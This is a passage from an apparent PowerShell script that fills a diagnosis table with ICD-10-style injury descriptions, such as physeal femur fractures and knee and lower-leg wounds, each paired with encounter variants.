Type IV physeal fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right femur","Salter-Harris Type IV physeal fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right femur","Salter-Harris Type IV physeal fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right femur","Salter-Harris Type IV physeal fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right femur","Salter-Harris Type IV physeal fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left femur","Salter-Harris Type IV physeal fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left femur","Salter-Harris Type IV physeal fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left femur","Salter-Harris Type IV physeal fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left femur","Salter-Harris Type IV physeal fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left femur","Salter-Harris Type IV physeal fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left femur","Salter-Harris Type IV physeal fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified femur","Salter-Harris Type IV physeal fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified femur","Salter-Harris Type IV physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified femur","Salter-Harris Type IV physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified femur","Salter-Harris Type IV physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified femur","Salter-Harris Type IV physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified femur","Salter-Harris Type IV physeal fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right femur","Other physeal fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right femur","Other physeal fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right femur","Other physeal fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right femur","Other physeal fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right femur","Other physeal fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right femur","Other physeal fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left femur","Other physeal fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left femur","Other physeal fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left femur","Other physeal fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left femur","Other physeal fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left femur","Other physeal fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left femur","Other physeal fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified femur","Other physeal fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified femur","Other physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified femur","Other physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified femur","Other physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified femur","Other physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified femur","Other physeal fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right hip","Other specified injuries of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right hip","Other specified injuries of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right hip","Other specified injuries of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left hip","Other specified injuries of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left hip","Other specified injuries of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left hip","Other specified injuries of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified hip","Other specified injuries of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified hip","Other specified injuries of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified hip","Other specified injuries of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right thigh","Other specified injuries of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right thigh","Other specified injuries of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right thigh","Other specified injuries of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left thigh","Other specified injuries of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left thigh","Other specified injuries of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left thigh","Other specified injuries of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified thigh","Other specified injuries of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified thigh","Other specified injuries of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified thigh","Other specified injuries of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right hip","Unspecified injury of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right hip","Unspecified injury of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right hip","Unspecified injury of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left hip","Unspecified injury of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left hip","Unspecified injury of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left hip","Unspecified injury of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified hip","Unspecified injury of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified hip","Unspecified injury of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified hip","Unspecified injury of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right thigh","Unspecified injury of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right thigh","Unspecified injury of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right thigh","Unspecified injury of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left thigh","Unspecified injury of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left thigh","Unspecified injury of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left thigh","Unspecified injury of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified thigh","Unspecified injury of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified thigh","Unspecified injury of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified thigh","Unspecified injury of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified knee","Contusion of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified knee","Contusion of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified knee","Contusion of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right knee","Contusion of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right knee","Contusion of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right knee","Contusion of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left knee","Contusion of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left knee","Contusion of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left knee","Contusion of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lower leg","Contusion of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lower leg","Contusion of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified lower leg","Contusion of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right lower leg","Contusion of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right lower leg","Contusion of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right lower leg","Contusion of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left lower leg","Contusion of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left lower leg","Contusion of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left lower leg","Contusion of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right knee","Abrasion, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right knee","Abrasion, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right knee","Abrasion, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left knee","Abrasion, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left knee","Abrasion, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left knee","Abrasion, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified knee","Abrasion, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified knee","Abrasion, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified knee","Abrasion, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right knee","Blister (nonthermal), right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right knee","Blister (nonthermal), right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right knee","Blister (nonthermal), right knee, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left knee","Blister (nonthermal), left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left knee","Blister (nonthermal), left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left knee","Blister (nonthermal), left knee, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified knee","Blister (nonthermal), unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified knee","Blister (nonthermal), unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified knee","Blister (nonthermal), unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right knee","External constriction, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right knee","External constriction, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right knee","External constriction, right knee, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left knee","External constriction, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left knee","External constriction, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left knee","External constriction, left knee, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified knee","External constriction, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified knee","External constriction, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified knee","External constriction, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right knee","Superficial foreign body, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right knee","Superficial foreign body, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right knee","Superficial foreign body, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left knee","Superficial foreign body, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left knee","Superficial foreign body, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left knee","Superficial foreign body, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified knee","Superficial foreign body, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified knee","Superficial foreign body, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified knee","Superficial foreign body, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right knee","Insect bite (nonvenomous), right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right knee","Insect bite (nonvenomous), right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right knee","Insect bite (nonvenomous), right knee, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left knee","Insect bite (nonvenomous), left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left knee","Insect bite (nonvenomous), left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left knee","Insect bite (nonvenomous), left knee, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified knee","Insect bite (nonvenomous), unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified knee","Insect bite (nonvenomous), unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified knee","Insect bite (nonvenomous), unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right knee","Other superficial bite of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right knee","Other superficial bite of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right knee","Other superficial bite of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left knee","Other superficial bite of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left knee","Other superficial bite of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left knee","Other superficial bite of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified knee","Other superficial bite of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified knee","Other superficial bite of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified knee","Other superficial bite of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, right lower leg","Abrasion, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right lower leg","Abrasion, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, right lower leg","Abrasion, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, left lower leg","Abrasion, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left lower leg","Abrasion, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, left lower leg","Abrasion, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified lower leg","Abrasion, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified lower leg","Abrasion, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion, unspecified lower leg","Abrasion, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right lower leg","Blister (nonthermal), right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right lower leg","Blister (nonthermal), right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right lower leg","Blister (nonthermal), right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left lower leg","Blister (nonthermal), left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left lower leg","Blister (nonthermal), left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left lower leg","Blister (nonthermal), left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified lower leg","Blister (nonthermal), unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified lower leg","Blister (nonthermal), unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified lower leg","Blister (nonthermal), unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right lower leg","External constriction, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right lower leg","External constriction, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right lower leg","External constriction, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left lower leg","External constriction, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left lower leg","External constriction, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left lower leg","External constriction, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified lower leg","External constriction, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified lower leg","External constriction, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified lower leg","External constriction, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right lower leg","Superficial foreign body, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right lower leg","Superficial foreign body, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right lower leg","Superficial foreign body, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left lower leg","Superficial foreign body, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left lower leg","Superficial foreign body, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left lower leg","Superficial foreign body, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified lower leg","Superficial foreign body, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified lower leg","Superficial foreign body, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified lower leg","Superficial foreign body, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right lower leg","Insect bite (nonvenomous), right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right lower leg","Insect bite (nonvenomous), right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right lower leg","Insect bite (nonvenomous), right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left lower leg","Insect bite (nonvenomous), left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left lower leg","Insect bite (nonvenomous), left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left lower leg","Insect bite (nonvenomous), left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified lower leg","Insect bite (nonvenomous), unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified lower leg","Insect bite (nonvenomous), unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified lower leg","Insect bite (nonvenomous), unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite, right lower leg","Other superficial bite, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite, right lower leg","Other superficial bite, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite, right lower leg","Other superficial bite, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite, left lower leg","Other superficial bite, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite, left lower leg","Other superficial bite, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite, left lower leg","Other superficial bite, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite, unspecified lower leg","Other superficial bite, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite, unspecified lower leg","Other superficial bite, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite, unspecified lower leg","Other superficial bite, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right knee","Unspecified superficial injury of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right knee","Unspecified superficial injury of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right knee","Unspecified superficial injury of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left knee","Unspecified superficial injury of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left knee","Unspecified superficial injury of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left knee","Unspecified superficial injury of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified knee","Unspecified superficial injury of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified knee","Unspecified superficial injury of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified knee","Unspecified superficial injury of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right lower leg","Unspecified superficial injury of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right lower leg","Unspecified superficial injury of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right lower leg","Unspecified superficial injury of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left lower leg","Unspecified superficial injury of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left lower leg","Unspecified superficial injury of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left lower leg","Unspecified superficial injury of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified lower leg","Unspecified superficial injury of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified lower leg","Unspecified superficial injury of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified lower leg","Unspecified superficial injury of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right knee","Unspecified open wound, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right knee","Unspecified open wound, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right knee","Unspecified open wound, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left knee","Unspecified open wound, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left knee","Unspecified open wound, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left knee","Unspecified open wound, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified knee","Unspecified open wound, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified knee","Unspecified open wound, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified knee","Unspecified open wound, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right knee","Laceration without foreign body, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right knee","Laceration without foreign body, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right knee","Laceration without foreign body, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left knee","Laceration without foreign body, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left knee","Laceration without foreign body, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left knee","Laceration without foreign body, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified knee","Laceration without foreign body, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified knee","Laceration without foreign body, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified knee","Laceration without foreign body, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right knee","Laceration with foreign body, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right knee","Laceration with foreign body, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right knee","Laceration with foreign body, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left knee","Laceration with foreign body, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left knee","Laceration with foreign body, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left knee","Laceration with foreign body, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified knee","Laceration with foreign body, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified knee","Laceration with foreign body, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified knee","Laceration with foreign body, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right knee","Puncture wound without foreign body, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right knee","Puncture wound without foreign body, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right knee","Puncture wound without foreign body, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left knee","Puncture wound without foreign body, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left knee","Puncture wound without foreign body, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left knee","Puncture wound without foreign body, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified knee","Puncture wound without foreign body, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified knee","Puncture wound without foreign body, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified knee","Puncture wound without foreign body, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right knee","Puncture wound with foreign body, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right knee","Puncture wound with foreign body, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right knee","Puncture wound with foreign body, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left knee","Puncture wound with foreign body, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left knee","Puncture wound with foreign body, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left knee","Puncture wound with foreign body, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified knee","Puncture wound with foreign body, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified knee","Puncture wound with foreign body, 